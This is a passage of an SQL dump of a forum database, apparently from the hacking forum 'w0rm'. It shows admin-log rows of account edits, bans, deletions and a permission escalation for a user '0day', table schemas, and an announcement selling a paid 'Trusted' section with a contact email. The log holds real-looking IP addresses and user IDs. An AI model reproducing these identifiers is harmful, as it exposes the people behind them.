(2509, 100, 1463696347, 'user.php', 'edit', '', '5.220.255.27'),
(2510, 100, 1463696349, 'user.php', 'edit', '', '5.220.255.27'),
(2511, 100, 1463696350, 'user.php', 'edit', '', '5.220.255.27'),
(2512, 100, 1463696352, 'user.php', 'edit', '', '5.220.255.27'),
(2513, 100, 1463696352, 'user.php', 'edit', 'user id = 386', '5.220.255.27'),
(2514, 100, 1463696354, 'user.php', 'edit', '', '5.220.255.27'),
(2515, 100, 1463696356, 'user.php', 'modify', '', '5.220.255.27'),
(2516, 100, 1463696363, 'user.php', 'find', '', '5.220.255.27'),
(2517, 100, 1463696368, 'user.php', 'edit', '', '5.220.255.27'),
(2518, 100, 1463696370, 'user.php', 'edit', '', '5.220.255.27'),
(2519, 100, 1463696371, 'user.php', 'edit', '', '5.220.255.27'),
(2520, 100, 1463696373, 'user.php', 'edit', '', '5.220.255.27'),
(2521, 100, 1463696374, 'user.php', 'edit', '', '5.220.255.27'),
(2522, 100, 1463696374, 'user.php', 'modify', '', '5.220.255.27'),
(2523, 100, 1463696382, 'user.php', 'find', '', '5.220.255.27'),
(2524, 100, 1463696390, 'user.php', 'edit', '', '5.220.255.27'),
(2525, 100, 1463696399, 'user.php', 'edit', '', '5.220.255.27'),
(2526, 100, 1463696402, 'user.php', 'edit', 'user id = 1', '5.220.255.27'),
(2527, 100, 1463696415, 'user.php', 'update', 'user id = 188', '5.220.255.27'),
(2528, 100, 1463696417, 'user.php', 'modify', 'user id = 188', '5.220.255.27'),
(2529, 100, 1463696422, 'user.php', 'update', '', '5.220.255.27'),
(2530, 100, 1463696446, 'user.php', 'update', 'user id = 386', '5.220.255.27'),
(2531, 100, 1463696485, 'user.php', 'modify', '', '5.220.255.27'),
(2532, 100, 1463696493, 'user.php', 'find', '', '5.220.255.27'),
(2533, 100, 1463696518, 'banning.php', 'banuser', '', '5.220.255.27'),
(2534, 100, 1463696530, 'user.php', 'modify', '', '5.220.255.27'),
(2535, 100, 1463696594, 'user.php', 'find', '', '5.220.255.27'),
(2536, 100, 1463696611, 'user.php', 'remove', 'user id = 152', '5.220.255.27'),
(2537, 100, 1463696618, 'user.php', 'remove', 'user id = 152', '5.220.255.27'),
(2538, 100, 1463696623, 'user.php', 'kill', 'user id = 152', '5.220.255.27'),
(2539, 100, 1463696625, 'user.php', 'modify', '', '5.220.255.27'),
(2540, 100, 1463696645, 'user.php', 'find', '', '5.220.255.27'),
(2541, 100, 1463696651, 'user.php', 'edit', 'user id = 156', '5.220.255.27'),
(2542, 100, 1463696660, 'user.php', 'edit', 'user id = 132', '5.220.255.27'),
(2543, 100, 1463696662, 'user.php', 'edit', 'user id = 142', '5.220.255.27'),
(2544, 100, 1463696664, 'user.php', 'edit', 'user id = 137', '5.220.255.27'),
(2545, 100, 1463696665, 'user.php', 'edit', 'user id = 120', '5.220.255.27'),
(2546, 100, 1463696667, 'user.php', 'edit', 'user id = 108', '5.220.255.27'),
(2547, 100, 1463696668, 'user.php', 'edit', 'user id = 119', '5.220.255.27'),
(2548, 100, 1463696670, 'user.php', 'edit', 'user id = 147', '5.220.255.27'),
(2549, 100, 1463696671, 'user.php', 'edit', 'user id = 134', '5.220.255.27'),
(2550, 100, 1463696674, 'user.php', 'edit', 'user id = 110', '5.220.255.27'),
(2551, 100, 1463696677, 'user.php', 'edit', 'user id = 146', '5.220.255.27'),
(2552, 100, 1463696678, 'user.php', 'edit', 'user id = 157', '5.220.255.27'),
(2553, 100, 1463696681, 'user.php', 'edit', 'user id = 140', '5.220.255.27'),
(2554, 100, 1463696684, 'user.php', 'edit', 'user id = 122', '5.220.255.27'),
(2555, 100, 1463696685, 'user.php', 'edit', 'user id = 111', '5.220.255.27'),
(2556, 100, 1463696688, 'user.php', 'edit', 'user id = 106', '5.220.255.27'),
(2557, 100, 1463696688, 'user.php', 'edit', 'user id = 105', '5.220.255.27'),
(2558, 100, 1463696692, 'user.php', 'edit', 'user id = 149', '5.220.255.27'),
(2559, 100, 1463696694, 'user.php', 'edit', 'user id = 113', '5.220.255.27'),
(2560, 100, 1463696698, 'user.php', 'edit', 'user id = 107', '5.220.255.27'),
(2561, 100, 1463696701, 'user.php', 'edit', 'user id = 141', '5.220.255.27'),
(2562, 100, 1463696704, 'user.php', 'edit', 'user id = 124', '5.220.255.27'),
(2563, 100, 1463696705, 'user.php', 'edit', 'user id = 159', '5.220.255.27'),
(2564, 100, 1463696708, 'user.php', 'edit', 'user id = 139', '5.220.255.27'),
(2565, 100, 1463696710, 'user.php', 'edit', 'user id = 131', '5.220.255.27'),
(2566, 100, 1463696712, 'user.php', 'edit', 'user id = 118', '5.220.255.27'),
(2567, 100, 1463696872, 'user.php', 'update', 'user id = 156', '5.220.255.27'),
(2568, 100, 1463696878, 'user.php', 'update', 'user id = 132', '5.220.255.27'),
(2569, 100, 1463696880, 'user.php', 'modify', 'user id = 132', '5.220.255.27'),
(2570, 100, 1463696884, 'user.php', 'update', 'user id = 142', '5.220.255.27'),
(2571, 100, 1463696886, 'user.php', 'modify', 'user id = 142', '5.220.255.27'),
(2572, 100, 1463696892, 'user.php', 'update', 'user id = 137', '5.220.255.27'),
(2573, 100, 1463696901, 'user.php', 'update', 'user id = 120', '5.220.255.27'),
(2574, 100, 1463696907, 'user.php', 'update', 'user id = 108', '5.220.255.27'),
(2575, 100, 1463696908, 'user.php', 'modify', 'user id = 108', '5.220.255.27'),
(2576, 100, 1463696914, 'user.php', 'update', 'user id = 119', '5.220.255.27'),
(2577, 100, 1463696919, 'user.php', 'update', 'user id = 147', '5.220.255.27'),
(2578, 100, 1463696922, 'user.php', 'modify', 'user id = 147', '5.220.255.27'),
(2579, 100, 1463696926, 'user.php', 'update', 'user id = 134', '5.220.255.27'),
(2580, 100, 1463696932, 'user.php', 'update', 'user id = 110', '5.220.255.27'),
(2581, 100, 1463696940, 'user.php', 'update', 'user id = 146', '5.220.255.27'),
(2582, 100, 1463696946, 'user.php', 'update', 'user id = 157', '5.220.255.27'),
(2583, 100, 1463696950, 'user.php', 'update', 'user id = 140', '5.220.255.27'),
(2584, 100, 1463696954, 'user.php', 'update', 'user id = 122', '5.220.255.27'),
(2585, 100, 1463696961, 'user.php', 'update', 'user id = 111', '5.220.255.27'),
(2586, 100, 1463696966, 'user.php', 'update', 'user id = 106', '5.220.255.27'),
(2587, 100, 1463696971, 'user.php', 'update', 'user id = 105', '5.220.255.27'),
(2588, 100, 1463696975, 'user.php', 'update', 'user id = 149', '5.220.255.27'),
(2589, 100, 1463696980, 'user.php', 'update', 'user id = 113', '5.220.255.27'),
(2590, 100, 1463696985, 'user.php', 'update', 'user id = 107', '5.220.255.27'),
(2591, 100, 1463696989, 'user.php', 'update', 'user id = 141', '5.220.255.27'),
(2592, 100, 1463696993, 'user.php', 'update', 'user id = 124', '5.220.255.27'),
(2593, 100, 1463696998, 'user.php', 'update', 'user id = 159', '5.220.255.27'),
(2594, 100, 1463697004, 'user.php', 'update', 'user id = 139', '5.220.255.27'),
(2595, 100, 1463697010, 'user.php', 'update', 'user id = 131', '5.220.255.27'),
(2596, 100, 1463697012, 'user.php', 'modify', 'user id = 131', '5.220.255.27'),
(2597, 100, 1463697019, 'user.php', 'update', 'user id = 118', '5.220.255.27'),
(2598, 100, 1463697020, 'user.php', 'modify', 'user id = 118', '5.220.255.27'),
(2599, 100, 1463697364, 'user.php', 'update', 'user id = 387', '5.220.255.27'),
(2600, 100, 1463697366, 'user.php', 'modify', 'user id = 387', '5.220.255.27'),
(2601, 100, 1463697398, 'user.php', 'find', '', '5.220.255.27'),
(2602, 100, 1463697403, 'user.php', 'modify', '', '5.220.255.27'),
(2603, 100, 1463697423, 'user.php', 'find', '', '5.220.255.27'),
(2604, 100, 1463697526, 'forum.php', 'modify', '', '5.220.255.27'),
(2605, 387, 1463697602, 'announcement.php', 'update', '', '176.126.252.12'),
(2606, 100, 1463697616, 'forum.php', 'modify', '', '5.220.255.27'),
(2607, 387, 1463697617, 'announcement.php', 'edit', 'announcement id = 1', '176.126.252.12'),
(2608, 100, 1463697617, 'forum.php', 'add', '', '5.220.255.27'),
(2609, 100, 1463697619, 'forumpermission.php', 'modify', '', '5.220.255.27'),
(2610, 100, 1463697648, 'forumpermission.php', 'modify', '', '5.220.255.27'),
(2611, 100, 1463697649, 'moderator.php', 'showlist', '', '5.220.255.27'),
(2612, 100, 1463697658, 'moderator.php', 'editglobal', 'user id = 29', '5.220.255.27'),
(2613, 100, 1463697658, 'moderator.php', 'editglobal', 'username = Yakuza112', '5.220.255.27'),
(2614, 100, 1463697673, 'moderator.php', 'showlist', '', '5.220.255.27'),
(2615, 100, 1463697678, 'user.php', 'edit', 'user id = 29', '5.220.255.27'),
(2616, 100, 1463697697, 'user.php', 'update', 'user id = 29', '5.220.255.27'),
(2617, 100, 1463697698, 'user.php', 'modify', 'user id = 29', '5.220.255.27'),
(2618, 100, 1463697702, 'user.php', 'edit', 'user id = 30', '5.220.255.27'),
(2619, 100, 1463697709, 'user.php', 'update', 'user id = 30', '5.220.255.27'),
(2620, 100, 1463697711, 'user.php', 'modify', 'user id = 30', '5.220.255.27'),
(2621, 100, 1463697715, 'user.php', 'edit', 'user id = 10', '5.220.255.27'),
(2622, 100, 1463697716, 'user.php', 'edit', 'user id = 33', '5.220.255.27'),
(2623, 100, 1463697717, 'user.php', 'edit', 'user id = 40', '5.220.255.27'),
(2624, 100, 1463697718, 'user.php', 'edit', 'user id = 16', '5.220.255.27'),
(2625, 100, 1463697719, 'user.php', 'edit', 'user id = 9', '5.220.255.27'),
(2626, 100, 1463697723, 'user.php', 'edit', 'user id = 8', '5.220.255.27'),
(2627, 100, 1463697728, 'user.php', 'update', 'user id = 10', '5.220.255.27'),
(2628, 100, 1463697731, 'user.php', 'modify', 'user id = 10', '5.220.255.27'),
(2629, 100, 1463697736, 'user.php', 'update', 'user id = 33', '5.220.255.27'),
(2630, 100, 1463697741, 'user.php', 'update', 'user id = 40', '5.220.255.27'),
(2631, 100, 1463697746, 'user.php', 'update', 'user id = 16', '5.220.255.27'),
(2632, 100, 1463697752, 'user.php', 'update', 'user id = 9', '5.220.255.27'),
(2633, 100, 1463697757, 'user.php', 'update', 'user id = 8', '5.220.255.27'),
(2634, 100, 1463697763, 'moderator.php', 'showlist', '', '5.220.255.27'),
(2635, 100, 1463697869, 'announcement.php', 'modify', '', '5.220.255.27'),
(2636, 100, 1463697883, 'notice.php', 'modify', '', '5.220.255.27'),
(2637, 100, 1463697891, 'resources.php', '', '', '5.220.255.27'),
(2638, 100, 1463698017, 'moderate.php', 'posts', '', '5.220.255.27'),
(2639, 387, 1463698105, 'announcement.php', 'update', 'announcement id = 1', '176.126.252.12'),
(2640, 387, 1463698107, 'forum.php', '', '', '176.126.252.12'),
(2641, 100, 1463698129, 'moderate.php', 'attachments', '', '5.220.255.27'),
(2642, 100, 1463698132, 'moderate.php', 'events', '', '5.220.255.27'),
(2643, 100, 1463698133, 'moderate.php', 'posts', '', '5.220.255.27'),
(2644, 100, 1463698134, 'moderate.php', 'messages', '', '5.220.255.27'),
(2645, 100, 1463698136, 'user.php', 'moderate', '', '5.220.255.27'),
(2646, 100, 1463698141, 'attachment.php', 'types', '', '5.220.255.27'),
(2647, 100, 1463698144, 'attachmentpermission.php', '', '', '5.220.255.27'),
(2648, 100, 1463698145, 'attachment.php', 'intro', '', '5.220.255.27'),
(2649, 100, 1463698146, 'moderate.php', 'attachments', '', '5.220.255.27'),
(2650, 100, 1463698233, 'queries.php', 'modify', '', '5.220.255.27'),
(2651, 100, 1463698234, 'diagnostic.php', 'list', '', '5.220.255.27'),
(2652, 100, 1463698237, 'misc.php', 'chooser', '', '5.220.255.27'),
(2653, 100, 1463698240, 'repair.php', 'list', '', '5.220.255.27'),
(2654, 100, 1463698241, 'backup.php', 'choose', '', '5.220.255.27'),
(2655, 100, 1463698249, 'stats.php', 'index', '', '5.220.255.27'),
(2656, 100, 1463698254, 'stats.php', 'reg', '', '5.220.255.27'),
(2657, 100, 1463698254, 'stats.php', 'top', '', '5.220.255.27'),
(2658, 100, 1463698255, 'stats.php', 'activity', '', '5.220.255.27'),
(2659, 100, 1463698260, 'subscriptions.php', 'transactions', '', '5.220.255.27'),
(2660, 100, 1463698261, 'subscriptions.php', 'transactions', '', '5.220.255.27'),
(2661, 100, 1463698263, 'adminlog.php', 'choose', '', '5.220.255.27'),
(2662, 100, 1463698266, 'plugin.php', 'product', '', '5.220.255.27'),
(2663, 100, 1463698269, 'plugin.php', 'modify', '', '5.220.255.27'),
(2664, 100, 1463698281, 'subscriptions.php', 'modify', '', '5.220.255.27'),
(2665, 100, 1463698283, 'subscriptions.php', 'add', '', '5.220.255.27'),
(2666, 100, 1463698291, 'usertitle.php', 'modify', '', '5.220.255.27'),
(2667, 100, 1463698300, 'usertitle.php', 'edit', 'usertitle id = 1', '5.220.255.27'),
(2668, 100, 1463698310, 'usertitle.php', 'doupdate', 'usertitle id = 1', '5.220.255.27'),
(2669, 100, 1463698312, 'usertitle.php', 'modify', '', '5.220.255.27'),
(2670, 100, 1463698337, 'usertitle.php', 'add', '', '5.220.255.27'),
(2671, 100, 1463698350, 'usertitle.php', 'insert', '', '5.220.255.27'),
(2672, 100, 1463698351, 'usertitle.php', 'modify', '', '5.220.255.27'),
(2673, 100, 1463698378, 'usertitle.php', 'add', '', '5.220.255.27'),
(2674, 100, 1463698386, 'usertitle.php', 'insert', '', '5.220.255.27'),
(2675, 100, 1463698388, 'usertitle.php', 'modify', '', '5.220.255.27'),
(2676, 100, 1463698389, 'usertitle.php', 'add', '', '5.220.255.27'),
(2677, 100, 1463698394, 'usertitle.php', 'insert', '', '5.220.255.27'),
(2678, 100, 1463698395, 'usertitle.php', 'modify', '', '5.220.255.27'),
(2679, 100, 1463698397, 'usertitle.php', 'add', '', '5.220.255.27'),
(2680, 100, 1463698405, 'usertitle.php', 'insert', '', '5.220.255.27'),
(2681, 100, 1463698407, 'usertitle.php', 'modify', '', '5.220.255.27'),
(2682, 100, 1463698413, 'adminreputation.php', 'modify', '', '5.220.255.27'),
(2683, 100, 1463698471, 'profilefield.php', 'modify', '', '5.220.255.27'),
(2684, 100, 1463698476, 'profilefield.php', 'add', '', '5.220.255.27'),
(2685, 100, 1463698480, 'admininfraction.php', 'modify', '', '5.220.255.27'),
(2686, 100, 1463698486, 'admininfraction.php', 'editlevel', '', '5.220.255.27'),
(2687, 100, 1463698489, 'admininfraction.php', 'editgroup', '', '5.220.255.27'),
(2688, 100, 1463698491, 'admininfraction.php', 'editbangroup', '', '5.220.255.27'),
(2689, 100, 1463698509, 'socialgroup_icon.php', '', '', '5.220.255.27'),
(2690, 100, 1463698515, 'usergroup.php', 'modify', '', '5.220.255.27'),
(2691, 100, 1463698525, 'usertitle.php', 'modify', '', '5.220.255.27'),
(2692, 100, 1463698530, 'usertitle.php', 'remove', 'usertitle id = 4', '5.220.255.27'),
(2693, 100, 1463698532, 'usertitle.php', 'kill', 'usertitle id = 4', '5.220.255.27'),
(2694, 100, 1463698533, 'usertitle.php', 'modify', '', '5.220.255.27'),
(2695, 100, 1463698538, 'usertitle.php', 'remove', 'usertitle id = 5', '5.220.255.27'),
(2696, 100, 1463698540, 'usertitle.php', 'kill', 'usertitle id = 5', '5.220.255.27'),
(2697, 100, 1463698541, 'usertitle.php', 'modify', '', '5.220.255.27'),
(2698, 100, 1463698544, 'usertitle.php', 'remove', 'usertitle id = 6', '5.220.255.27'),
(2699, 100, 1463698545, 'usertitle.php', 'kill', 'usertitle id = 6', '5.220.255.27'),
(2700, 100, 1463698547, 'usertitle.php', 'modify', '', '5.220.255.27'),
(2701, 100, 1463698549, 'usertitle.php', 'remove', 'usertitle id = 7', '5.220.255.27'),
(2702, 100, 1463698551, 'usertitle.php', 'kill', 'usertitle id = 7', '5.220.255.27'),
(2703, 100, 1463698552, 'usertitle.php', 'modify', '', '5.220.255.27'),
(2704, 100, 1463698560, 'usergroup.php', 'modify', '', '5.220.255.27'),
(2705, 100, 1463698576, 'user.php', 'find', '', '5.220.255.27'),
(2706, 100, 1463698614, 'usergroup.php', 'modify', '', '5.220.255.27'),
(2707, 100, 1463698628, 'usergroup.php', 'add', '', '5.220.255.27'),
(2708, 100, 1463698652, 'accessmask.php', 'modify', '', '5.220.255.27'),
(2709, 100, 1463698657, 'user.php', 'add', '', '5.220.255.27'),
(2710, 100, 1463698657, 'user.php', 'modify', '', '5.220.255.27'),
(2711, 100, 1463698669, 'user.php', 'find', '', '5.220.255.27'),
(2712, 100, 1463698672, 'user.php', 'find', '', '5.220.255.27'),
(2713, 100, 1463698690, 'user.php', 'edit', '', '5.220.255.27'),
(2714, 100, 1463698700, 'user.php', 'edit', '', '5.220.255.27'),
(2715, 100, 1463698704, 'user.php', 'edit', '', '5.220.255.27'),
(2716, 100, 1463698707, 'user.php', 'edit', '', '5.220.255.27'),
(2717, 100, 1463698711, 'user.php', 'edit', '', '5.220.255.27'),
(2718, 100, 1463698714, 'user.php', 'edit', '', '5.220.255.27'),
(2719, 100, 1463698717, 'user.php', 'edit', '', '5.220.255.27'),
(2720, 100, 1463698721, 'user.php', 'edit', '', '5.220.255.27'),
(2721, 100, 1463698727, 'passwordcheck.php', '', '', '5.220.255.27'),
(2722, 100, 1463698744, 'email.php', 'genlist', '', '5.220.255.27'),
(2723, 100, 1463698747, 'email.php', 'start', '', '5.220.255.27'),
(2724, 100, 1463698763, 'thread.php', 'prune', '', '5.220.255.27'),
(2725, 100, 1463698765, 'thread.php', 'killpoll', '', '5.220.255.27'),
(2726, 387, 1463760181, 'forum.php', 'modify', '', '77.247.181.162'),
(2727, 387, 1463760196, 'forum.php', 'modify', '', '77.247.181.162'),
(2728, 387, 1463760226, 'forum.php', 'modify', '', '77.247.181.162'),
(2729, 387, 1463760231, 'moderate.php', 'posts', '', '77.247.181.162'),
(2730, 100, 1463770085, 'user.php', 'add', '', '5.220.247.242'),
(2731, 100, 1463770179, 'user.php', 'update', '', '5.220.247.242'),
(2732, 100, 1463770181, 'user.php', 'modify', 'user id = 388', '5.220.247.242'),
(2733, 100, 1463770243, 'user.php', 'edit', 'user id = 388', '5.220.247.242'),
(2734, 100, 1463770419, 'user.php', 'modify', '', '5.220.247.242'),
(2735, 100, 1463770421, 'user.php', 'find', '', '5.220.247.242'),
(2736, 100, 1463770427, 'user.php', 'find', '', '5.220.247.242'),
(2737, 100, 1463770431, 'user.php', 'modify', '', '5.220.247.242'),
(2738, 100, 1463770440, 'user.php', 'find', '', '5.220.247.242'),
(2739, 100, 1463770440, 'user.php', 'edit', 'user id = 388', '5.220.247.242'),
(2740, 100, 1463770490, 'user.php', 'find', '', '5.220.247.242'),
(2741, 100, 1463770491, 'user.php', 'edit', 'user id = 388', '5.220.247.242'),
(2742, 100, 1463770561, 'help.php', 'answer', '', '5.220.247.242'),
(2743, 100, 1463770582, 'user.php', 'update', 'user id = 388', '5.220.247.242'),
(2744, 100, 1463770586, 'user.php', 'modify', 'user id = 388', '5.220.247.242'),
(2745, 100, 1463770588, 'user.php', 'edit', 'user id = 388', '5.220.247.242'),
(2746, 100, 1463770617, 'adminpermissions.php', 'edit', 'user id = 388 (0day)', '5.220.247.242'),
(2747, 100, 1463770630, 'adminpermissions.php', 'update', 'user id = 388 (0day) (0 » 491516)', '5.220.247.242'),
(2748, 100, 1463770633, 'adminpermissions.php', '', '', '5.220.247.242'),
(2749, 100, 1463770635, 'user.php', 'edit', 'user id = 388', '5.220.247.242'),
(2750, 100, 1463770650, 'user.php', 'update', 'user id = 388', '5.220.247.242'),
(2751, 100, 1463770715, 'user.php', 'editaccess', 'user id = 388', '5.220.247.242'),
(2752, 100, 1463770721, 'user.php', 'updateaccess', 'user id = 388', '5.220.247.242'),
(2753, 100, 1463770729, 'user.php', 'edit', 'user id = 388', '5.220.247.242'),
(2754, 100, 1463770734, 'resources.php', 'viewuser', 'user id = 388', '5.220.247.242'),
(2755, 100, 1463770735, 'resources.php', 'viewuser', 'user id = 388', '5.220.247.242'),
(2756, 100, 1463770943, 'user.php', 'edit', 'user id = 388', '5.220.247.20'),
(2757, 100, 1463770952, 'adminpermissions.php', 'edit', 'user id = 388 (0day)', '5.220.247.20'),
(2758, 100, 1463770976, 'user.php', 'editaccess', 'user id = 388', '5.220.247.20'),
(2759, 100, 1463770986, 'resources.php', 'viewuser', 'user id = 388', '5.220.247.20'),
(2760, 100, 1463771001, 'help.php', 'answer', '', '5.220.247.20'),
(2761, 100, 1465233390, 'options.php', '', '', '172.68.11.238'),
(2762, 100, 1465233418, 'options.php', '', '', '172.68.11.238'),
(2763, 100, 1465233432, 'options.php', 'options', '', '172.68.11.238'),
(2764, 100, 1465233469, 'options.php', 'dooptions', '', '172.68.11.238'),
(2765, 100, 1465233471, 'options.php', 'options', '', '172.68.11.238');
DROP TABLE IF EXISTS `adminmessage`;
CREATE TABLE `adminmessage` (
`adminmessageid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`varname` varchar(250) NOT NULL DEFAULT '',
`dismissable` smallint(5) unsigned NOT NULL DEFAULT '0',
`script` varchar(50) NOT NULL DEFAULT '',
`action` varchar(20) NOT NULL DEFAULT '',
`execurl` mediumtext,
`method` enum('get','post') NOT NULL DEFAULT 'post',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`status` enum('undone','done','dismissed') NOT NULL DEFAULT 'undone',
`statususerid` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`adminmessageid`),
KEY `script_action` (`script`,`action`),
KEY `varname` (`varname`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `adminutil`;
CREATE TABLE `adminutil` (
`title` varchar(50) NOT NULL DEFAULT '',
`text` mediumtext,
PRIMARY KEY (`title`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `adminutil` (`title`, `text`) VALUES
('datastorelock', '0');
DROP TABLE IF EXISTS `album`;
CREATE TABLE `album` (
`albumid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`createdate` int(10) unsigned NOT NULL DEFAULT '0',
`lastpicturedate` int(10) unsigned NOT NULL DEFAULT '0',
`visible` int(10) unsigned NOT NULL DEFAULT '0',
`moderation` int(10) unsigned NOT NULL DEFAULT '0',
`title` varchar(100) NOT NULL DEFAULT '',
`description` mediumtext,
`state` enum('public','private','profile') NOT NULL DEFAULT 'public',
`coverpictureid` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`albumid`),
KEY `userid` (`userid`,`lastpicturedate`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `albumpicture`;
CREATE TABLE `albumpicture` (
`albumid` int(10) unsigned NOT NULL DEFAULT '0',
`pictureid` int(10) unsigned NOT NULL DEFAULT '0',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`albumid`,`pictureid`),
KEY `albumid` (`albumid`,`dateline`),
KEY `pictureid` (`pictureid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `albumupdate`;
CREATE TABLE `albumupdate` (
`albumid` int(10) unsigned NOT NULL DEFAULT '0',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`albumid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `announcement`;
CREATE TABLE `announcement` (
`announcementid` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(250) NOT NULL DEFAULT '',
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`startdate` int(10) unsigned NOT NULL DEFAULT '0',
`enddate` int(10) unsigned NOT NULL DEFAULT '0',
`pagetext` mediumtext,
`forumid` smallint(6) NOT NULL DEFAULT '0',
`views` int(10) unsigned NOT NULL DEFAULT '0',
`announcementoptions` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`announcementid`),
KEY `forumid` (`forumid`),
KEY `startdate` (`enddate`,`forumid`,`startdate`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `announcement` (`announcementid`, `title`, `userid`, `startdate`, `enddate`, `pagetext`, `forumid`, `views`, `announcementoptions`) VALUES
(1, 'Trusted Section', 387, 1463688000, 1892408400, 'w0rm is under new management, as you can see there will be launched a section named \"Trusted\" which only will be available to the most elite members and/or contributors.\r\n\r\nPayment & info: ke7hb@w0rm.ws', -1, 365, 29);
DROP TABLE IF EXISTS `announcementread`;
CREATE TABLE `announcementread` (
`announcementid` int(10) unsigned NOT NULL DEFAULT '0',
`userid` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`announcementid`,`userid`),
KEY `userid` (`userid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `announcementread` (`announcementid`, `userid`) VALUES
(1, 100),
(1, 104),
(1, 161),
(1, 166),
(1, 171),
(1, 172),
(1, 173),
(1, 178),
(1, 196),
(1, 240),
(1, 283),
(1, 289),
(1, 291),
(1, 295),
(1, 387);
DROP TABLE IF EXISTS `attachment`;
CREATE TABLE `attachment` (
`attachmentid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`thumbnail_dateline` int(10) unsigned NOT NULL DEFAULT '0',
`filename` varchar(100) NOT NULL DEFAULT '',
`filedata` mediumblob,
`visible` smallint(5) unsigned NOT NULL DEFAULT '0',
`counter` int(10) unsigned NOT NULL DEFAULT '0',
`filesize` int(10) unsigned NOT NULL DEFAULT '0',
`postid` int(10) unsigned NOT NULL DEFAULT '0',
`filehash` char(32) NOT NULL DEFAULT '',
`posthash` char(32) NOT NULL DEFAULT '',
`thumbnail` mediumblob,
`thumbnail_filesize` int(10) unsigned NOT NULL DEFAULT '0',
`extension` varchar(20) CHARACTER SET latin1 COLLATE latin1_bin NOT NULL DEFAULT '',
PRIMARY KEY (`attachmentid`),
KEY `filesize` (`filesize`),
KEY `filehash` (`filehash`),
KEY `userid` (`userid`),
KEY `posthash` (`posthash`,`userid`),
KEY `postid` (`postid`),
KEY `visible` (`visible`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `attachmentpermission`;
CREATE TABLE `attachmentpermission` (
`attachmentpermissionid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`extension` varchar(20) CHARACTER SET latin1 COLLATE latin1_bin NOT NULL DEFAULT '',
`usergroupid` int(10) unsigned NOT NULL DEFAULT '0',
`size` int(10) unsigned NOT NULL DEFAULT '0',
`width` smallint(5) unsigned NOT NULL DEFAULT '0',
`height` smallint(5) unsigned NOT NULL DEFAULT '0',
`attachmentpermissions` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`attachmentpermissionid`),
UNIQUE KEY `extension` (`extension`,`usergroupid`),
KEY `usergroupid` (`usergroupid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `attachmenttype`;
CREATE TABLE `attachmenttype` (
`extension` char(20) CHARACTER SET latin1 COLLATE latin1_bin NOT NULL DEFAULT '',
`mimetype` varchar(255) NOT NULL DEFAULT '',
`size` int(10) unsigned NOT NULL DEFAULT '0',
`width` smallint(5) unsigned NOT NULL DEFAULT '0',
`height` smallint(5) unsigned NOT NULL DEFAULT '0',
`enabled` smallint(5) unsigned NOT NULL DEFAULT '1',
`display` smallint(5) unsigned NOT NULL DEFAULT '0',
`thumbnail` smallint(5) unsigned NOT NULL DEFAULT '0',
`newwindow` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`extension`),
KEY `enabled` (`enabled`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `attachmenttype` (`extension`, `mimetype`, `size`, `width`, `height`, `enabled`, `display`, `thumbnail`, `newwindow`) VALUES
('bmp', 'a:1:{i:0;s:26:\"Content-type: image/bitmap\";}', 20000, 620, 280, 1, 0, 0, 0),
('doc', 'a:1:{i:0;s:32:\"Content-type: application/msword\";}', 20000, 0, 0, 1, 0, 0, 0),
('gif', 'a:1:{i:0;s:23:\"Content-type: image/gif\";}', 20000, 620, 280, 1, 0, 1, 0),
('jpe', 'a:1:{i:0;s:24:\"Content-type: image/jpeg\";}', 20000, 620, 280, 1, 0, 1, 0),
('jpeg', 'a:1:{i:0;s:24:\"Content-type: image/jpeg\";}', 20000, 620, 280, 1, 0, 1, 0),
('jpg', 'a:1:{i:0;s:24:\"Content-type: image/jpeg\";}', 100000, 0, 0, 1, 0, 1, 0),
('pdf', 'a:1:{i:0;s:29:\"Content-type: application/pdf\";}', 20000, 0, 0, 1, 0, 1, 0),
('png', 'a:1:{i:0;s:23:\"Content-type: image/png\";}', 20000, 620, 280, 1, 0, 1, 0),
('psd', 'a:1:{i:0;s:29:\"Content-type: unknown/unknown\";}', 20000, 0, 0, 1, 0, 1, 0),
('rar', 'a:1:{i:0;s:29:\"Content-type: unknown/unknown\";}', 100000, 0, 0, 1, 0, 0, 0),
('txt', 'a:1:{i:0;s:24:\"Content-type: plain/text\";}', 20000, 0, 0, 1, 2, 0, 0),
('zip', 'a:1:{i:0;s:29:\"Content-type: application/zip\";}', 100000, 0, 0, 1, 0, 0, 0);
DROP TABLE IF EXISTS `attachmentviews`;
CREATE TABLE `attachmentviews` (
`attachmentid` int(10) unsigned NOT NULL DEFAULT '0',
KEY `postid` (`attachmentid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `avatar`;
CREATE TABLE `avatar` (
`avatarid` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(100) NOT NULL DEFAULT '',
